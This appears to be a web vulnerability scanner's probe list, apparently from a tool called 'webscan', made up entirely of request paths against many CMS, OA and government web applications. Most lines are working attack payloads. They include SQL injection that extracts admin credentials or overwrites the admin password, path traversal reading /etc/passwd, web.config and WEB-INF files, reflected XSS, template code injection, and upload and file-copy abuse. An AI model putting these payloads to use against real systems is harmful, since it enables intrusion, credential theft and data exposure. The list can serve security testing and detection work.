/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
/index.php?m=company&s=admin/business_info_list
/index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
/getpwd4.asp
/?m=offer&s=offer_list&id=1-webscan%23
/MemberLogin.asp
/views.asp
/basket.asp?h%77_id=513%20and%201=2
/protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
/index.php?app=tag&ac=add&ts=do
/member/index.php?ugid31=51'%20and%20'1122'='12
/siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
/UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
/search.php?mod=information&ids=1-webscan&catid=1
/box.php?
/siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
/siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
//siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
/siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
/downLoadFile.action?filePath=/WEB-INF/web.xml
/siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
/job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
/searchLines.aspx?LName=h%25';
/ProductBuy.Asp
/newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
/searchLines.aspx?LName=h&t=webscan()'
/viewlist.aspx?typeid=webscan()'
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
/?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
/admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
/index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
/gallery--p,0,1122%20and%200-0---1.html
/?m=info.detail&id=1-webscan
/misc.php?mod=getuserinfo&uid=-1
/?m=city.getSearch&index=reer
/?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
/admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/Product.asp
/user/getpassword.asp
/admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
/plus/ajax_user.php?act=check_email
/plus/ajax_user.php?act=check_usname
/HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
/ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
/ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
/index.php?app=user&ac=plugin&in=../../robots.txt%00
/member.php?act=login&op=forget
/item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
/?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
/index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
/?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
/index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
/index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
/wap/index.php
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
/member/index.php
/wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
/index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
/video.php
/news.php?classid=2
/ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/ajax.php?action=contentpage
/comments.php?id=3a&tablepre=boka_ckck
/rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
//wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
/admin/index.php?_m=../template/css/login.css%00&_a=admin_list
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
/info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
/ajax.php?action=letter&letter=a
/index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
/index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
/index.php/Index/index/name/$%7B@print(md5(1122))%7D
/index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
/index.php?m=payment&s=admin/pickupmod
/admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
/user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
/servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
/mep-admin/DcServlet
/mep-admin/userAction!queryUser.action?start=0&limit=10
/admin/picupload.aspx
/manager/picupload.aspx
/microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
/TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
/admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
/index.php?c=tj&f=include&js=/../../config.php
/index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
/api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
/radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
/system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/
/styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
/web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
/forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
/Ajax_Handle/UploadAttachmentHandler.ashx
/Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
/Ajax_Handle/UploadPictureHandler.ashx
/Ajax_Handle/UploadLocalVideoHandler.ashx
/index.php?m=api&a=userpreview
/index.php?m=Appmanager&a=loadapp
/CMSUploadFile.aspx
/api/shop.aspx
/sysinfo.jsp
/login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
/login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
/file/MyDownLoad.ashx?path=../web.config
/file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
/broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
/feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
/api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
/FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
/setup/setup1.jsp
/examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
/Article/?Type=18%20/**/and/**/1=char(106)--
/login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
/file/EmailDownload.ashx?url=~/web.config&name=web.config
/file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
/file/DownLoad.ashx?path=~/Routes.config
/file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
/file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
/download.jsp?path=WEB-INF/&name=web.xml
/page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
/mx_form/order_save.php
/index.php?app=tag&ac=add&ts=do
/member.php?act=index
/Article/?KeyWord=1'%20and%201=char(97)%20--
/apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
/admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
/Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
/Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
/Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
/Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
/jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
/jiep/down.jsp?pathfile=down.jsp%00.txt
/index.php?m=Goods&a=showcate&id=1'cfreer
/Goods-showcate-id-1.html'cfreer
/pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
/jvideo/objectbox/selectx_userlist.jsp
/yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
/Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
/Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
/ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
/ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/oa_server/App_Pages/App_page/UserSpuerAdd.aspx
/oa_server/App_Pages/App_page/user_list.aspx
/cms/cms/site/cms_site_template_upload.jsp?action=save
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/lm/front/reg.jsp?sysid=../reg.jsp%00.jpg
/web/SubmitLogin.do
/pic.aspx?classid=60)%20and%201=char(106)%20--
/frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/index.php?c=MTA3==&op=../../../../../../../../../../etc/passwd%00.jpg
/SRP2003/UserManage/sysuser/modifypage.asp?id=1
/venus/AsVenusCA/desk/message/reply.asp
/Article/ArticleDetaileNews.aspx?type=2/**/and/**/1=char(106)--
/mx_form/order_save.php?form_id=5
/download.aspx?id=337&accessory=UploadFile/softdown/../../web.config
/cms/web/testsql.jsp
/web/zwdt/jjj.BjcxServlet
/login.php?LOGIN_USER_INCLUDE=/etc/passwd
/cms/client/uploadpic_html.jsp?toname=test.jsp&diskno=webscan
/cms/fileupload/uploadwordpic.jsp?AddWebInfoTID=11&AddWebColumnID=22&filepath=/app/
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/webUser/webUser!list.action
/logincheck.php?UNAME=cfreer%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
/module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/admin/annual/delete_leave.post.php
/admin/workingsituation/check.php?uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29&project=459&type=task&name=bbb
/admin/workingsituation/download_excel.php?day=30&start=&end=&project=0&uid=3%20and%201%3D%28updatexml%281%2Cconcat%280x5e24%2C%28select%20md5%281122%29%29%2C0x5e24%29%2C1%29%29%23&task=0
/admin/workingsituation/ajax.php?task_id=10039s&type=update_status&status=1s%27%20and%201%3D%28updatexml%281%2Cconcat%280x23%2C%28select%20md5%281122%29%29%2C0x23%29%2C1%29%29%23
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/jdwm/cgi/getpwd.cgi
/public/jspdownload.jsp?FileFullPath=%5Cetc%5Cpasswd&FileName=passwd
/public/jspdownload.jsp?FileFullPath=c:%5Cwindows%5Cwin.ini&FileName=win.ini
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/CorpInfo/CorpBaseInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAptitudeInfo.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/PersonnelList.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpAchievementList_SG.aspx?CorpCode=1122'%20and%201=char(106)%20--
/Credit/ShowCorpCredit.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpDeBox.aspx?CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpRewardsList.aspx?RewardsPunishment=1122&CorpCode=1122'%20and%201=char(106)%20--
/BM/Project/HistoryBindSegmentLeftList.aspx?CorpType=1122&CorpCode=1122'%20and%201=char(106)%20--
/CorpInfo/CorpSendLeftTree.aspx?JoinID=1122&CorpCode=1122'%20and%201=char(106)%20--
/forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20--
/forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20
/forUI/Policy/DO.file?ID='%20or%201=char(106)%20--
/search/index/portalId/427?keyword=1'%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(114)%7C%7Cchr(101)%7C%7Cchr(106)%7C%7Cchr(101)%7C%7Cchr(114)%20FROM%20dual)))%7C%7C'
/Ajax_Handle/UploadAttachmentHandler.ashx
/ExtendForm/Down/Technological.aspx?id=1'%20and%201=char(106)%20--
/public/editext/up/soundsave.asp
/public/AspUpload/upload.asp?path=../../upload&processid=1
/xyEmployee_checkLoginForUser.do?userName=reer
/opac/ajax_get_file.php?filename=../admin/opacadminpwd.php
/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
/kc_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL#
/kecheng.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL#%20
/kecheng_view.php?id=-1%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
/index.php?language_id=1%20and%20%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%28substring%28%28select%28md5%281122%29%29%29%2C1%2C62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23&is_protect=1&action=cccc
/picnews.asp?%69d=-1%20and%201=2%20union%20select%201,2,3,chr(106),5,6,7,8,9,10,11,12%20from%20admin
/opensoft.asp?%69d=10%20and%201=2
/phpsso_server/?m=phpsso&c=index&a=getapplist&appid=1&data=
/bmsltxDetail.do
/setAcceptance.do
/setAcceptance.do
/setMaterials.do?ITEM_ID=12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/intoSpDept.do?bmid=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/admin/payonline.php/login.php?table=information_schema.SCHEMATA%20where%201=(select%201%20from%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
/nobom.php
/infoDisplayAction.do?method=listDeptInformationInFolderStyle&pageURL=/application/oa/information/view/buu_list.jsp&interval=5&departmentId=1'%20AND%209935=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(112)%7C%7CCHR(102)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9935=9935)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(117)%7C%7CCHR(115)%7C%7CCHR(115)%7C%7CCHR(113))%20AND%20'keyi'='keyi&filters=
/lm/front/mailhotlist.jsp?editpagename=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&sysid=001
